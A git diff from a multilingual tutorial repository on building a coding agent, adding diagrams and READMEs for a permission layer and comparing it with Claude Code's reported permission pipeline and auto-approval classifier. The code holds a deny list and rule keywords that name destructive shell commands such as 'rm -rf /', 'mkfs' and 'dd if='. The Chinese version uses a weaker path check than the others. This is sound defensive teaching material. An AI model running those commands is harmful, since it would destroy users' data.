+1,109 @@ + + + + + + + + + + + + + + + + + + + + Tool Concurrency — 教学版 vs Claude Code + + + + 模型一次返回 5 个工具调用 + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + 教学版:按工具名硬编码分组 + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + 结果:2 组 + + + Sequential(先跑) + bash "ls" · write B + + + Concurrent(并发) + read A · glob · read C + + ⚠ bash "ls" 被排到 sequential 组 + 它是只读的,本可以和 read 并发跑 + + + + Claude Code:isConcurrencySafe(input) + + + 每个工具调用单独判断: + tool.isConcurrencySafe(parsedInput) → bool + + 结果:3 个 batch(按连续块分批) + + + Batch 1 + 并发 + read A · glob + + + + + Batch 2 + 并发 + bash "ls" + + + + + Batch 3 + 串行 + write B + + + Batch 4 + read C · 并发 + + ✓ bash "ls" 正确并发,比教学版快 + ✓ 输入相关的判断,不是工具名硬编码 + + + + 核心差异 + • 教学版:按工具名分组 → 简单但粗糙,bash 的只读命令(ls、cat)被错误串行化 + • CC:按 isConcurrencySafe(input) 逐次判断 → bash "ls" 和 read_file 可以并发,bash "rm" 必须排队 + • 教学版的简化是刻意的——先理解"某些工具可以同时跑",进阶时自然会问"bash ls 能不能和 read 一起跑?" + diff --git a/s02_tool_use/images/tool-dispatch.en.svg b/s02_tool_use/images/tool-dispatch.en.svg new file mode 100644 index 000000000..8864f7d97 --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.en.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — Loop Unchanged, Just Add Dispatch Mapping + + + s01 Preserved + + + + User Query + messages[] + + + + + + + LLM + stop_reason check + + + + + + + tool_use? 
+ + + + No + + Return Result + + + + Yes + + + s02 New + + + + TOOL_HANDLERS Dispatch Mapping + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + Append tool_result to messages + + + + + s01 Preserved (loop, LLM, decision — completely unchanged) + + s02 New (5 tools + dispatch mapping) + Only 1 line changed in the loop: run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s02_tool_use/images/tool-dispatch.ja.svg b/s02_tool_use/images/tool-dispatch.ja.svg new file mode 100644 index 000000000..279efa6ef --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.ja.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — ループ不変、ディスパッチマッピングを追加 + + + s01 保持 + + + + ユーザーの質問 + messages[] + + + + + + + LLM + stop_reason 判定 + + + + + + + tool_use? + + + + No + + 結果を返す + + + + Yes + + + s02 新規 + + + + TOOL_HANDLERS ディスパッチマッピング + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + tool_result を messages に追加 + + + + + s01 保持(ループ、LLM、判定 — 完全に不変) + + s02 新規(5 つのツール + ディスパッチマッピング) + ループ内で変更されたのは 1 行だけ:run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s02_tool_use/images/tool-dispatch.svg b/s02_tool_use/images/tool-dispatch.svg new file mode 100644 index 000000000..d56bf0f04 --- /dev/null +++ b/s02_tool_use/images/tool-dispatch.svg @@ -0,0 +1,108 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Tool Use — 循环不变,只加分发映射 + + + s01 保留 + + + + 用户提问 + messages[] + + + + + + + 大模型 (LLM) + stop_reason 判断 + + + + + + + tool_use? 
+ + + + + + 返回结果 + + + + + + + s02 新增 + + + + TOOL_HANDLERS 分发映射 + + + + + + + bash + → run_bash() + + + + read_file + → run_read() + + + + write_file + → run_write() + + + + edit_file + → run_edit() + + + + glob + → run_glob() + + + + tool_result 追加到 messages + + + + + s01 保留(循环、LLM、判断——完全不变) + + s02 新增(5 个工具 + 分发映射) + 循环里只改了 1 行:run_bash() → TOOL_HANDLERS[block.name]() + diff --git a/s03_permission/README.en.md b/s03_permission/README.en.md new file mode 100644 index 000000000..2c0bce7e1 --- /dev/null +++ b/s03_permission/README.en.md @@ -0,0 +1,231 @@ +# s03: Permission — Boundaries Before Freedom + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"Boundaries before freedom"* — The permission pipeline decides which operations need approval. +> +> **Harness Layer**: Permission — a gate before tool execution. + +--- + +## The Problem + +s02's Agent has 5 tools and can do anything. Ask it to "clean up the project," and it might run `rm -rf /`. + +You shouldn't rely on **trusting the model** for safety. Safety should be enforced by **code** — a gate inserted before every tool execution. + +--- + +## The Solution + +![Permission Overview](images/permission-overview.en.svg) + +s02's loop is fully preserved. The only change is inserting `check_permission()` before tool execution — each tool call passes through three gates in a fixed order: hard deny first, then soft ask, and if neither matches, allow. + +The three gates correspond to three decisions: + +| Gate | Purpose | On Match | +|------|---------|----------| +| 1. Deny List | Permanently forbidden operations (`rm -rf /`, `sudo`) | Denied immediately, not executed | +| 2. Rule Matching | Context-dependent operations (writing outside workspace, `rm` files) | Passed to Gate 3 | +| 3. User Approval | After Gate 2 matches, pauses for user confirmation | User decides allow or deny | + +None of the three gates match → execute directly. 
Most routine operations take this path.
+
+---
+
+## How It Works
+
+![Permission Pipeline](images/permission-pipeline.en.svg)
+
+**Gate 1**: A hard deny list. Check first; if matched, return a block message.
+
+```python
+DENY_LIST = [
+    "rm -rf /", "sudo", "shutdown", "reboot",
+    "mkfs", "dd if=", "> /dev/sda",
+]
+
+def check_deny_list(command: str) -> str | None:
+    for pattern in DENY_LIST:
+        if pattern in command:
+            return f"Blocked: '{pattern}' is on the deny list"
+    return None
+```
+
+**Gate 2**: Rule matching — describes "when to ask the user." Each rule specifies a tool and a check condition.
+
+```python
+PERMISSION_RULES = [
+    {
+        "tools": ["write_file", "edit_file"],
+        # Resolve relative paths against WORKDIR before testing containment —
+        # a bare "test.txt" resolves inside the workspace and passes through.
+        "check": lambda args: not (WORKDIR / str(args.get("path", ""))).resolve().is_relative_to(WORKDIR),
+        "message": "Writing outside workspace",
+    },
+    {
+        "tools": ["bash"],
+        "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]),
+        "message": "Potentially destructive command",
+    },
+]
+
+def check_rules(tool_name: str, args: dict) -> str | None:
+    for rule in PERMISSION_RULES:
+        if tool_name in rule["tools"] and rule["check"](args):
+            return rule["message"]
+    return None
+```
+
+**Gate 3**: After a rule matches, pause for user input.
+
+```python
+def ask_user(tool_name: str, args: dict, reason: str) -> str:
+    print(f"\n⚠ {reason}")
+    print(f"  Tool: {tool_name}({args})")
+    choice = input("  Allow? 
[y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**All three gates chained together**, inserted before tool execution: + +```python +def check_permission(block) -> bool: + # Gate 1: Hard deny + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # Gate 2 + 3: Rule matching → User approval + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# In agent_loop — s02's loop with just one line added: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← NEW + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 original + results.append(...) +``` + +--- + +## Changes from s02 + +| Component | Before (s02) | After (s03) | +|-----------|-------------|-------------| +| Security model | None (trust the model) | Three-gate permission pipeline | +| New functions | — | check_deny_list, check_rules, ask_user, check_permission | +| Loop | Executes all tools directly | Inserts check_permission() before execution | + +--- + +## Try It + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +Try these prompts: + +1. `Create a file called test.txt in the current directory` (should pass through) +2. `Delete all temporary files in /tmp` (bash + rm triggers Gate 2) +3. `What files are in the current directory?` (read-only, all pass) +4. `Try to write a file to /etc/something` (writing outside workspace triggers Gate 2) + +What to watch for: Which operations pass through? Which need your confirmation? Which are denied outright? + +--- + +## What's Next + +Permission checks are in place — but every check is hardcoded as `check_permission()` inside the loop. 
What if you want to add logging before and after each tool execution? What if you want to auto-trigger a git commit after certain operations? Scattering this extension logic throughout the loop turns it into spaghetti.
+
+→ s04 Hooks: Attach a series of hooks to the loop. Extension logic hangs on the hooks; the loop itself stays clean.
+
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `types/permissions.ts`, `toolExecution.ts`, `tools.ts`, `yoloClassifier.ts`, `bashPermissions.ts`. + +### 1. PermissionResult: Not 3, but 4 + +The teaching version's three gates (deny → ask → allow) don't fully correspond to CC. CC's `PermissionResult` has 4 behaviors (`types/permissions.ts:241-266`): + +| behavior | Meaning | Teaching Version Equivalent | +|----------|---------|---------------------------| +| `allow` | Allow directly | Gate 3 passes | +| `deny` | Deny directly | Gate 1 matches | +| `ask` | Show dialog to user | Gate 2 matches | +| `passthrough` | Tool doesn't express opinion, passes to generic pipeline | Not in teaching version | + +### 2. The Complete 8-Step Verification Pipeline + +CC's `checkPermissionsAndCallTool()` (`toolExecution.ts:599-1745`) isn't three gates — it's eight steps: + +1. **Zod schema validation** (L615) — parameter type checking +2. **validateInput()** (L683) — tool-level semantic validation +3. **backfillObservableInput()** (L784) — backfill legacy fields +4. **PreToolUse hooks** (L800) — hooks can return allow/deny/ask +5. **resolveHookPermissionDecision()** (L921) — coordinate hook + pipeline decisions +6. **hasPermissionsToUseTool()** — six-layer rule check: + - 1a. Entire tool disabled by deny rule → `deny` + - 1b. Entire tool flagged by ask rule → `ask` + - 1c. `tool.checkPermissions()` tool's own judgment + - 1d. Tool itself returns deny → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. Content-related ask rules → `ask` (not bypassable) + - 1g. Security check violation → `ask` (not bypassable) +7. **Mode bypass** (L1268) — bypassPermissions mode → `allow` +8. **passthrough → ask conversion** (L1300) — default to asking + +### 3. Deny List: Not One File, but 8 Sources + +CC doesn't have a single deny list. 
Permission rules come from 8 sources (`types/permissions.ts:54-62`): + +| Source | Configuration Location | +|--------|----------------------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | Feature flags | +| `policySettings` | Enterprise management policy | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | Inline command | +| `session` | In-session temporary authorization | + +Each rule format: `{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`. Rules from multiple sources are merged and sorted by priority (local > project > user). + +### 4. What is isDestructive() + +The teaching version treats `isDestructive` as part of permission checking. But in CC, it's **purely for UI display** (`Tool.ts:406`) — showing a `[destructive]` label in the tool list. It doesn't participate in permission decisions. All tools return `false` by default. Only ExitWorktree (on remove) and MCP tools (depending on `annotations.destructiveHint`) override it. + +### 5. YoloClassifier (Auto-Approval) + +In CC's auto mode, it doesn't pop a dialog every time. `classifyYoloAction` (`yoloClassifier.ts:1012`) sends the tool call + conversation context to a classifier LLM to judge safety. It first tries acceptEdits mode simulation (if acceptEdits allows → auto-approve), then checks the safe tool whitelist, and finally calls the classifier. If the classifier rejects too many times in a row → falls back to manual approval. + +### 6. Permission Bubbling + +A sub-Agent's (forked via AgentTool) `permissionMode` is set to `'bubble'` (`forkSubagent.ts:50`). This means permission dialogs **bubble up to the parent Agent's terminal**, rather than being silently denied in the sub-Agent. The Bash classifier continues running during this process — displaying the permission dialog while judging in the background whether auto-approval is possible. 
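The cascade in section 5 can be sketched as pure decision logic, with the classifier LLM injected as a callable. All names here are illustrative assumptions, not CC's actual API:

```python
# Illustrative auto-approval cascade (names are assumptions, not CC's real code):
# 1) acceptEdits simulation  2) safe-tool whitelist  3) classifier LLM
# 4) too many classifier denials in a row -> fall back to manual approval.
SAFE_TOOLS = {"read_file", "glob"}
EDIT_TOOLS = {"write_file", "edit_file"}

def auto_approve(tool_name: str, classify, consecutive_denials: int,
                 max_denials: int = 3) -> str:
    if tool_name in EDIT_TOOLS:
        return "allow"  # acceptEdits simulation: edit tools auto-approved
    if tool_name in SAFE_TOOLS:
        return "allow"  # safe-tool whitelist, no LLM call needed
    if consecutive_denials >= max_denials:
        return "ask"    # classifier kept rejecting -> back to manual approval
    # classify() stands in for the classifier LLM call
    return "allow" if classify(tool_name) == "safe" else "ask"
```

Keeping the classifier as an injected callable makes the cascade testable without any LLM traffic.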
+ +### The Teaching Version's Simplification Is Intentional + +- 8-step pipeline → 3 gates: dramatically lower barrier to understanding +- 8 rule sources → 1 local DENY_LIST: manageable concept count +- isDestructive → omitted (teaching version has no UI layer) +- YoloClassifier → omitted (depends on additional LLM calls and telemetry) +- Permission bubbling → omitted (s15 covers multi-Agent) + +
+ + diff --git a/s03_permission/README.ja.md b/s03_permission/README.ja.md new file mode 100644 index 000000000..11cf7dda8 --- /dev/null +++ b/s03_permission/README.ja.md @@ -0,0 +1,231 @@ +# s03: Permission — 先に境界を引いて、自由を与える + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"Boundaries before freedom"* — 権限パイプラインは、どの操作に承認が必要かを決める。 +> +> **Harness レイヤー**: 権限 — ツール実行前に一つのゲートを追加。 + +--- + +## 課題 + +s02 の Agent は 5 つのツールを持ち、何でもできる。「プロジェクトを掃除して」と頼むと、`rm -rf /` を実行しかねない。 + +**モデルを信頼すること**で安全性を担保すべきではない。安全性は**コード**で担保する — ツール実行前に一つのゲートを追加する。 + +--- + +## ソリューション + +![Permission Overview](images/permission-overview.ja.svg) + +s02 のループは完全に維持される。唯一の変更は、ツール実行前に `check_permission()` を挿入すること — 各ツール呼び出しは 3 つのゲートを固定順序で通過する:ハード拒否が最優先、次にソフト確認、どちらも一致しなければ許可。 + +3 つのゲートは 3 つの決定に対応する: + +| ゲート | 役割 | 一致時 | +|--------|------|--------| +| 1. 拒否リスト | 常に禁止される操作(`rm -rf /`、`sudo`) | 即座に拒否、実行しない | +| 2. ルールマッチング | コンテキスト依存の操作(作業ディレクトリ外への書き込み、`rm` ファイル) | ゲート 3 へ | +| 3. 
ユーザー承認 | ゲート 2 が一致した場合、ユーザー確認を待機 | ユーザーが許可または拒否を決定 |
+
+3 つのゲートのどれにも一致しない → 直接実行。日常の操作の大部分はこの経路を通る。
+
+---
+
+## 仕組み
+
+![Permission Pipeline](images/permission-pipeline.ja.svg)
+
+**ゲート 1**:ハード拒否リスト。最初に確認し、一致すればブロックメッセージを返す。
+
+```python
+DENY_LIST = [
+    "rm -rf /", "sudo", "shutdown", "reboot",
+    "mkfs", "dd if=", "> /dev/sda",
+]
+
+def check_deny_list(command: str) -> str | None:
+    for pattern in DENY_LIST:
+        if pattern in command:
+            return f"Blocked: '{pattern}' is on the deny list"
+    return None
+```
+
+**ゲート 2**:ルールマッチング — 「いつユーザーに聞くべきか」を記述する。各ルールはツールとチェック条件を指定する。
+
+```python
+PERMISSION_RULES = [
+    {
+        "tools": ["write_file", "edit_file"],
+        # 相対パスを WORKDIR 基準で解決してから内外を判定 —
+        # "test.txt" のような相対パスは作業ディレクトリ内と正しく判定される
+        "check": lambda args: not (WORKDIR / str(args.get("path", ""))).resolve().is_relative_to(WORKDIR),
+        "message": "Writing outside workspace",
+    },
+    {
+        "tools": ["bash"],
+        "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]),
+        "message": "Potentially destructive command",
+    },
+]
+
+def check_rules(tool_name: str, args: dict) -> str | None:
+    for rule in PERMISSION_RULES:
+        if tool_name in rule["tools"] and rule["check"](args):
+            return rule["message"]
+    return None
+```
+
+**ゲート 3**:ルールが一致した後、ユーザー入力を待機。
+
+```python
+def ask_user(tool_name: str, args: dict, reason: str) -> str:
+    print(f"\n⚠ {reason}")
+    print(f"  Tool: {tool_name}({args})")
+    choice = input("  Allow? 
[y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**3 つのゲートを直列に接続**、ツール実行前に挿入する: + +```python +def check_permission(block) -> bool: + # ゲート 1: ハード拒否 + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # ゲート 2 + 3: ルールマッチング → ユーザー承認 + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# agent_loop で — s02 のループに 1 行追加するだけ: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← 新規 + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 既存 + results.append(...) +``` + +--- + +## s02 からの変更点 + +| コンポーネント | 変更前 (s02) | 変更後 (s03) | +|---------------|-------------|-------------| +| セキュリティモデル | なし(モデルを信頼) | 3 ゲート権限パイプライン | +| 新規関数 | — | check_deny_list, check_rules, ask_user, check_permission | +| ループ | すべてのツールを直接実行 | 実行前に check_permission() を挿入 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Create a file called test.txt in the current directory`(そのまま通過するはず) +2. `Delete all temporary files in /tmp`(bash + rm でゲート 2 が発動) +3. `What files are in the current directory?`(読み取り専用、すべて通過) +4. `Try to write a file to /etc/something`(作業ディレクトリ外への書き込みでゲート 2 が発動) + +観察のポイント:どの操作がそのまま通過するか? どれに確認が必要か? どれが即座に拒否されるか? + +--- + +## 次へ + +権限チェックは実装された — しかし、毎回ループ内に `check_permission()` をハードコードしている。ツール実行の前後にログを追加したい場合は? 特定の操作後に自動的に git commit をトリガーしたい場合は? このような拡張ロジックがループ内に散らばると、ループはすぐにスパゲッティになる。 + +→ s04 Hooks:ループに一列のフックを取り付ける。拡張ロジックはフックにぶら下げ、ループ自体は常にクリーンに保つ。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `types/permissions.ts`、`toolExecution.ts`、`tools.ts`、`yoloClassifier.ts`、`bashPermissions.ts` の完全分析に基づく。 + +### 一、PermissionResult:3 種ではなく、4 種 + +教育版の 3 つのゲート(deny → ask → allow)は CC と完全には対応しない。CC の `PermissionResult` には 4 つの behavior がある(`types/permissions.ts:241-266`): + +| behavior | 意味 | 教育版の対応 | +|----------|------|-------------| +| `allow` | 直接許可 | ゲート 3 通過 | +| `deny` | 直接拒否 | ゲート 1 一致 | +| `ask` | ユーザーにダイアログを表示 | ゲート 2 一致 | +| `passthrough` | ツールが意見を表明せず、汎用パイプラインに委ねる | 教育版にはなし | + +### 二、完全な 8 ステップ検証パイプライン + +CC の `checkPermissionsAndCallTool()`(`toolExecution.ts:599-1745`)は 3 つのゲートではなく、8 ステップ: + +1. **Zod schema 検証**(L615)— パラメータの型チェック +2. **validateInput()**(L683)— ツールレベルの意味的検証 +3. **backfillObservableInput()**(L784)— レガシーフィールドの補完 +4. **PreToolUse hooks**(L800)— フックが allow/deny/ask を返す +5. **resolveHookPermissionDecision()**(L921)— フック + パイプラインの決定を調整 +6. **hasPermissionsToUseTool()** — 6 層ルールチェック: + - 1a. ツール全体が deny rule で無効 → `deny` + - 1b. ツール全体が ask rule でマーク → `ask` + - 1c. `tool.checkPermissions()` ツール自身の判断 + - 1d. ツール自身が deny を返す → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. コンテンツ関連の ask ルール → `ask`(バイパス不可) + - 1g. セキュリティチェック違反 → `ask`(バイパス不可) +7. **モードバイパス**(L1268)— bypassPermissions モード → `allow` +8. 
**passthrough → ask 変換**(L1300)— デフォルトで ask に変換 + +### 三、拒否リスト:1 つのファイルではなく、8 つのソース + +CC には単一の deny list はない。権限ルールは 8 つのソースから来る(`types/permissions.ts:54-62`): + +| ソース | 設定場所 | +|--------|---------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | フィーチャーフラグ | +| `policySettings` | 企業管理ポリシー | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | インラインコマンド | +| `session` | セッション内一時承認 | + +各ルールの形式:`{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`。複数ソースのルールは統合され、優先順位(local > project > user)でソートされる。 + +### 四、isDestructive() とは + +教育版では `isDestructive` を権限判断の一部として扱っている。しかし CC では、これは**純粋に UI 表示用**(`Tool.ts:406`)である — ツール一覧に `[destructive]` ラベルを表示するだけ。権限決定には参加しない。デフォルトではすべてのツールが `false` を返す。ExitWorktree(remove 時)と MCP ツール(`annotations.destructiveHint` に依存)のみがこれをオーバーライドする。 + +### 五、YoloClassifier(自動承認) + +CC の auto モードでは、毎回ダイアログを表示するわけではない。`classifyYoloAction`(`yoloClassifier.ts:1012`)はツール呼び出し + 会話コンテキストを分類器 LLM に送って安全性を判断する。まず acceptEdits モードのシミュレーションを試み(acceptEdits が許可すれば → 自動承認)、次にセーフツールホワイトリストを確認し、最後に分類器を呼び出す。分類器が連続して拒否しすぎた場合 → 手動承認にフォールバック。 + +### 六、権限バブリング + +サブ Agent(AgentTool 経由でフォークされたもの)の `permissionMode` は `'bubble'` に設定される(`forkSubagent.ts:50`)。これは権限ダイアログが**親 Agent のターミナルにバブルアップ**することを意味する。サブ Agent で黙って拒否されるのではない。Bash 分類器はこの過程で引き続き実行され — 権限ダイアログを表示しつつ、バックグラウンドで自動承認可能か判断する。 + +### 教育版の単純化は意図的 + +- 8 ステップパイプライン → 3 ゲート:理解のハードルが大幅に下がる +- 8 ルールソース → 1 つのローカル DENY_LIST:概念量を制御可能 +- isDestructive → 省略(教育版には UI レイヤーがない) +- YoloClassifier → 省略(追加の LLM 呼び出しとテレメトリに依存) +- 権限バブリング → 省略(s15 でマルチ Agent を扱う) + +
+ + diff --git a/s03_permission/README.md b/s03_permission/README.md new file mode 100644 index 000000000..8d88cf74c --- /dev/null +++ b/s03_permission/README.md @@ -0,0 +1,231 @@ +# s03: Permission — 先划边界,再给自由 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"先划边界, 再给自由"* — 权限管线决定哪些操作需要审批。 +> +> **Harness 层**: 权限 — 在工具执行前加一道门。 + +--- + +## 问题 + +s02 的 Agent 手里有 5 个工具,什么都能做。你让它"清理一下项目",它可能执行 `rm -rf /`。 + +你不应该靠**信任模型**来保证安全。安全应该是**代码**来保证——在工具执行之前加一道门。 + +--- + +## 解决方案 + +![Permission Overview](images/permission-overview.svg) + +s02 的循环完全保留。唯一的变动在工具执行前插入 `check_permission()`——每个工具调用经过三道闸门,顺序固定:硬拒绝优先,软询问次之,都没命中就放行。 + +三道闸门对应三种决策: + +| 闸门 | 作用 | 命中后 | +|------|------|--------| +| 1. 拒绝列表 | 永远禁止的操作(`rm -rf /`、`sudo`) | 直接拒绝,不执行 | +| 2. 规则匹配 | 取决于上下文的操作(写工作区外、`rm` 文件) | 交给闸门 3 | +| 3. 用户审批 | 闸门 2 命中后,暂停等用户确认 | 用户决定允许或拒绝 | + +三道都没命中 → 直接执行。大部分日常操作走这条路。 + +--- + +## 工作原理 + +![Permission Pipeline](images/permission-pipeline.svg) + +**闸门 1**:一张硬拒绝表,先查,命中就返回阻止信息。 + +```python +DENY_LIST = [ + "rm -rf /", "sudo", "shutdown", "reboot", + "mkfs", "dd if=", "> /dev/sda", +] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None +``` + +**闸门 2**:规则匹配——描述"什么时候需要问用户"。每条规则指定工具和检查条件。 + +```python +PERMISSION_RULES = [ + { + "tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace", + }, + { + "tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]), + "message": "Potentially destructive command", + }, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None +``` + +**闸门 3**:规则命中后,暂停等用户输入。 
+ +```python +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n⚠ {reason}") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**三道闸门串在一起**,插在工具执行之前: + +```python +def check_permission(block) -> bool: + # 闸门 1: 硬拒绝 + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # 闸门 2 + 3: 规则匹配 → 用户审批 + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# 在 agent_loop 中——s02 的循环只加了一行: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← 新增 + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 原有 + results.append(...) +``` + +--- + +## 相对 s02 的变更 + +| 组件 | 之前 (s02) | 之后 (s03) | +|------|-----------|-----------| +| 安全模型 | 无(信任模型) | 三道闸门权限管线 | +| 新函数 | — | check_deny_list, check_rules, ask_user, check_permission | +| 循环 | 直接执行所有工具 | 执行前插入 check_permission() | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +试试这些 prompt: + +1. `Create a file called test.txt in the current directory`(应该直接通过) +2. `Delete all temporary files in /tmp`(bash + rm 会触发闸门 2) +3. `What files are in the current directory?`(只读,全部通过) +4. `Try to write a file to /etc/something`(写工作区外,触发闸门 2) + +观察重点:哪些操作直接通过?哪些需要你确认?哪些被直接拒绝? + +--- + +## 接下来 + +权限检查做了——但每次都在循环里硬编码 `check_permission()`。如果我想在每次工具执行前后加日志?如果想在某些操作后自动触发 git commit?这些扩展逻辑散落在 loop 里,循环很快就会变成一坨浆糊。 + +s04 Hooks → 给循环装一排钩子。扩展逻辑挂在钩子上,循环本身永远干净。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `types/permissions.ts`、`toolExecution.ts`、`tools.ts`、`yoloClassifier.ts`、`bashPermissions.ts` 的完整分析。 + +### 一、PermissionResult:不是 3 种,是 4 种 + +教学版的三道闸门(deny → ask → allow)和 CC 不完全对应。CC 的 `PermissionResult` 有 4 个 behavior(`types/permissions.ts:241-266`): + +| behavior | 含义 | 教学版对应 | +|----------|------|-----------| +| `allow` | 直接允许 | 闸门 3 通过 | +| `deny` | 直接拒绝 | 闸门 1 命中 | +| `ask` | 弹出对话框问用户 | 闸门 2 命中 | +| `passthrough` | 工具不表态,交给通用管线决定 | 教学版无 | + +### 二、完整的 8 步验证管线 + +CC 的 `checkPermissionsAndCallTool()`(`toolExecution.ts:599-1745`)不是三道闸门,是八步: + +1. **Zod schema 验证**(L615)— 参数类型检查 +2. **validateInput()**(L683)— 工具级语义验证 +3. **backfillObservableInput()**(L784)— 补全遗留字段 +4. **PreToolUse hooks**(L800)— 钩子可以返回 allow/deny/ask +5. **resolveHookPermissionDecision()**(L921)— 协调钩子+管线决策 +6. **hasPermissionsToUseTool()** — 六层规则检查: + - 1a. 整个工具被 deny rule 禁用 → `deny` + - 1b. 整个工具被 ask rule 标记 → `ask` + - 1c. `tool.checkPermissions()` 工具自己的判断 + - 1d. 工具自己返回 deny → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. 内容相关的 ask 规则 → `ask`(不可绕过) + - 1g. 安全检查违规 → `ask`(不可绕过) +7. **模式绕过**(L1268)— bypassPermissions 模式 → `allow` +8. 
**passthrough → ask 转换**(L1300)— 默认转为询问 + +### 三、拒绝列表:不是一个文件,是 8 个来源 + +CC 没有单一的 deny list。权限规则来自 8 个来源(`types/permissions.ts:54-62`): + +| 来源 | 配置位置 | +|------|---------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | Feature flags | +| `policySettings` | 企业管理策略 | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | 内联命令 | +| `session` | 会话内临时授权 | + +每条规则格式:`{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`。多个来源的规则合并,按优先级排序(local > project > user)。 + +### 四、isDestructive() 是什么 + +教学版把 `isDestructive` 当作权限判断的一部分。但 CC 中它**纯粹是 UI 展示用的**(`Tool.ts:406`)——在工具列表里显示 `[destructive]` 标签。它不参与权限决策。默认所有工具都返回 `false`。只有 ExitWorktree(remove 时)和 MCP 工具(依赖 `annotations.destructiveHint`)覆写了它。 + +### 五、YoloClassifier(自动审批) + +CC 的 auto 模式下,不会每次都弹对话框。`classifyYoloAction`(`yoloClassifier.ts:1012`)把工具调用 + 对话上下文发给一个分类器 LLM 判断是否安全。先尝试 acceptEdits 模式模拟(如果 acceptEdits 允许 → 直接批准),再查安全工具白名单,最后才调分类器。分类器连续拒绝太多次 → 回退到人工审批。 + +### 六、权限冒泡 + +子 Agent(通过 AgentTool fork 出来的)的 `permissionMode` 设为 `'bubble'`(`forkSubagent.ts:50`)。意思是权限弹窗**冒泡到父 Agent 的终端**,而不是在子 Agent 里静默拒绝。Bash 分类器在这个过程中继续跑——给权限对话框显示的同时在后台判断是否可以自动批准。 + +### 教学版的简化是刻意的 + +- 8 步管线 → 3 道闸门:理解门槛大幅降低 +- 8 个规则来源 → 1 个本地 DENY_LIST:概念量可控 +- isDestructive → 忽略(教学版没有 UI 层) +- YoloClassifier → 省略(依赖于额外的 LLM 调用和遥测系统) +- 权限冒泡 → 省略(s15 才涉及多 Agent) + +
